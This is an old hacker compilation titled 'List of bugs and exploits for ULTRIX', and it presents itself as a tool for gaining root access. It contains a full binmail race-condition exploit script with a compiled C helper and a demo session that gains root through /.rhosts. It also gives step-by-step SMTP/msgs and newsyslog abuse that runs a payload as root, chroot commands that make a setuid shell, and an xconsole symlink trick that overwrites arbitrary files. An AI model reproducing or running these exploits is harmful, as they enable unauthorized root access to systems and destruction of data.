List of bugs and exploits for ULTRIX v0.1

This list contains all the bugs i found in CERT advisorys, www sites,
list servers, and hacker's sites. It is a good (I think) collection
of bugs.
These bugs and exploits are not to breakin a system but to gain root access.
If you have an other bug to report mail to: ngm@matrix.kapatel.gr, or
just add it in the list.


*****************************************************************************
binmail(1) (/usr/bin/mail)

Systems Affected:
Ultrix 4.3, 4.3A, 4.4
SunOS 4.1.x
OSF/1 1.2, 1.3, and 2.0
Solbourne ?.?


(Possibly other platforms) 

Problem:
A race condition exists in binmail(1), which allows files to be created in
arbitrary places on the filesystem. These files can be owned by arbitrary
(usually system) users.

This example demonstrates how to become root on most affected machines by
creating/appending-to root's .rhosts file. Please do not do this unless you
have permission.

Create the following file, 'mailscript': 


8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# Syntax: mailscript user target-file rsh-user
#
# This exploits a flaw in SunOS binmail(1), and attempts
# to become the specified 'user', by creating a .rhosts
# file and using rsh.
#
# Written 1992 by [8LGM]
# Please do not use this script without permission.
#
PATH=/usr/ucb:/usr/bin:/bin      export PATH
IFS=" "                          export IFS

PROG="`basename $0`"
SPOOLDIR="/var/spool/mail"

# Check args
if [ $# -ne 3 ]; then
        echo "Syntax: $PROG user target-file rsh-user"
        exit 1
fi
TARGET="$1"
TARGET_FILE="$2"
RSH_USER="$3"

# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
        echo "Sorry, this only works on SunOS"
        exit 1
fi

# Check user exists
grep "^$TARGET:" /etc/passwd >/dev/null 2>&1
if [ $? -ne 0 ]; then
        echo "$PROG: Warning, $TARGET not in local passwd file"
        # We continue though, might be in the YP passwd file
fi

# Check target file
if [ -f $TARGET_FILE ]; then
        OLD_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'`
2>/dev/null
        echo "$PROG: Warning, $TARGET_FILE already exists, appending"
else
        OLD_TARGET_LEN=0
fi

# Delete spool file if its a link, and we are able
if [ -h "$SPOOLDIR/$TARGET" ]; then
        rm -f "$SPOOLDIR/$TARGET"
        # Dont worry about errors, we catch it below
fi

# Check mail file
if [ -f "$SPOOLDIR/$TARGET" ]; then
        echo "$PROG: ${TARGET}'s mail file exists."
        exit 1
fi

# Make the race program
cat >mailrace.c << 'EOF'
#include 
#include 

char lockfile[] =".lock";

main(argc,argv)
int argc;
char *argv[];
{
      char path[128];
        if (argc != 3) {
                fprintf(stderr, "Usage: %s mailfile newfile\n", argv[0]);
                exit(1);
        }

        strcpy(path, argv[1]);
        strcat(path, lockfile);
        while(access(path, F_OK));
        symlink(argv[2], argv[1]);
}
EOF
cc -o mailrace mailrace.c

# Check we now have mailrace
if [ ! -x "mailrace" ]; then
        echo "$PROG: couldnt compile mailrace.c - check it out"
        exit 1
fi

# Start mailrace
./mailrace $SPOOLDIR/$TARGET $TARGET_FILE &
RACE_PID=$!

# Send mail to the user
NEW_TARGET_LEN=$OLD_TARGET_LEN
while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
        echo "Sending mail to $TARGET"
        echo "localhost $USER" | /bin/mail $TARGET
        sleep 10
        kill -STOP $RACE_PID
        rm -f $SPOOLDIR/$TARGET >/dev/null 2>&1
        if [ -f $SPOOLDIR/$TARGET ]; then
                echo "$PROG: Sorry, we lost the race - cant try again."
                kill -9 $RACE_PID
                exit 1
        fi
        kill -CONT $RACE_PID
        if [ -f "$TARGET_FILE" ]; then
                NEW_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'`
2>/dev/null
        else
                NEW_TARGET_LEN=0
        fi
        if [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; then
                echo "We drew the race that time, trying again"
        fi
done

# We won the race
kill -9 $RACE_PID
echo "We won the race, becoming $RSH_USER"
rsh localhost -l $RSH_USER sh -i
exit 0
8<--------------------------- cut here ----------------------------




(Lines marked with > represent user input) 

Check what root users are on the system: 


>       % grep :0: /etc/passwd
        root:*:0:1:Operator:/:/bin/csh
        sysdiag:*:0:1:Old System
Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
        sundiag:*:0:1:System
Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
        +::0:0:::



We choose a user with UID 0, but without a /var/spool/mail/ file: 


>       % ls -l /var/spool/mail/sysdiag
        /var/spool/mail/sysdiag not found
 


Execute mailscript. The user is sysdiag, the target file is /.rhosts,
and the user to rsh to on success is root:


>       % chmod 700 mailscript
>       % ./mailscript sysdiag /.rhosts root
        mailscript: Warning, /.rhosts already exists, appending
        Sending mail to sysdiag
        We won the race, becoming root
        ./mailscript: 11051 Killed
        #



This problem exists because /var/spool/mail is rwxrwxrwt.
(Other systems have their spool dir rwxrwxr-x, and run their MUA's sgid mail)
Before it opens the mail file, binmail does an lstat(2) to check that it is
not about to write to a linked file. The intention is to prevent arbitrary
files from being created or appended to.

However, there exists a window of opportunity between lstat(2) and open(2);
if a link is created after lstat, open will then follow the link.
This is not a straightforward task, as it is not possible to predict when
to create the link.

Therefore it is necessary to have a program (mailrace) which continually
creates links and then removes them. To exploit the window of opportunity,
it is required that the link has been removed before the context switch for
lstat, but exists for open. There are three possible outcomes for this
race:-

1) lstat finds a link - mail returned to sender. 

2) link does not exist for lstat, but does for open - file created - we win. 

3) link does not exist for lstat or open - mailbox created. In this case,
it is not possible to remove the mailbox (as the stick bit is set on
/var/spool/mail), so it is necessary to choose another target user.

In tests, it would appear that the chances of 1) and 2) occurring are
approximately equal, with the chance of 3) being somewhat lower.

Please note that this vulnerability may exist on other platforms where the
mail spool directory has mode 777 and /bin/mail is setuid root.




exploit:
DO NOT DISTRIBUTE THIS F***ING BUG.  It works on Ultrix, and is one of the
few Ultrix bugs I have seen that still works.  It might work on other
platforms too.
 
This bug has been fixed in OSF, but not in Ultrix.
It should also work on any system that has the msgs mail alias.
 
$ grep msgs /etc/aliases
msgs: "|/usr/ucb/msgs -s"
 
Ok, the first thing to do is look in the /usr/msgs directory (or whatever
the directory is where the msgs files are kept), and see what the next msgs
file will be (if there is 1 and 2, then the next one is pretty easy to figure
out).
 
Then, make an executable /tmp/a that like makes an suid shell (this is pretty
easy to do, if you can't do it, don't consider yourself a hacker).
 
By default, newsyslog executes every 6 days at 4 am, but it depends on the
setup in crontab.  What it does is age the syslog file (at /usr/adm/syslog.1,
.2, ..., i think).
 
symlink /usr/msgs/<nextmsg> -> /usr/adm/newsyslog
 
$ telnet
telnet> o localhost 25
mail shit, version, etc
expn msgs
250 <"| /usr/ucb/msgs -s">
mail from: <`/tmp/a`>
rcpt to: msgs
data
doesn't matter what you put here
 .
 quit

 So now, when it writes to /usr/msgs/<nextmsg>, it will overwrite
 /usr/adm/newsyslog, and since /usr/adm/newsyslog is a shell script, it will
 expand `/tmp/a` by executing /tmp/a AS ROOT, giving you an suid shell or
 whatever /tmp/a does.

 From there, just clean up after yourself.





***
chroot(1)

Systems Affected:
Ultrix 4.0 and 4.1

Problem:
By default, /usr/bin/chroot is improperly installed. System users can gain
unauthorized privileges.

Exploit:
mkdir root
cd root
mkdir bin etc usr
cd bin
cp /bin/sh sh
cp /bin/su su
cd ../etc
cp /etc/passwd.orig passwd
cp /etc/group group
vi passwd (modify root password to root::0:0, etc)
cd ..
chroot /blah/blah/blah/root /bin/sh
su
chown root /bin/sh
chmod 2755 /bin/sh
chmod u+s /bin/sh
{shit..  you gotta copy chmod & chown before you do the chroot}
exit
exit
{now you're back in the original process}
/blah/blah/blah/root/bin/sh


***
binmail(1)

Systems Affected:
Ultrix 4.0 and 4.1


Problem:
A potential security vulnerability has been identified in ULTRIX
Version  4.1 where, under certain circumstances, user privileges
can be expanded via /usr/bin/mail.  This problem applies to both
the VAX and DEC RISC (i.e. DECsystem  and DECstation ) architectures.




***
telnet(1)
Systems Affected:
Ultrix 4.1 and 4.2


Problem:
A vulnerability exists such that ULTRIX 4.1 and 4.2 systems running the
LAT/Telnet gateway software can allow unauthorized privileged access.

Anyone who can access a terminal or modem connected to the LAT server
running the LAT/Telnet service can gain unauthorized root privileges.




***
xconsole(1)

Systems Affected:
Ultrix systems with X11 libs installed yet lacking a /dev/xcons.


Problem:
/usr/lib/X11/xconsole can be used to destructively overwrite any file on
the system. To duplicate set the display to a working server, create a
symbolic link from /tmp/Xconsole.log to the file to be overwritten, and run
xconsole. The target file will be overwritten with a single line error
message concerning a nonexistant /dev/xcons.









*****************************************************************************

                                                    -EastMan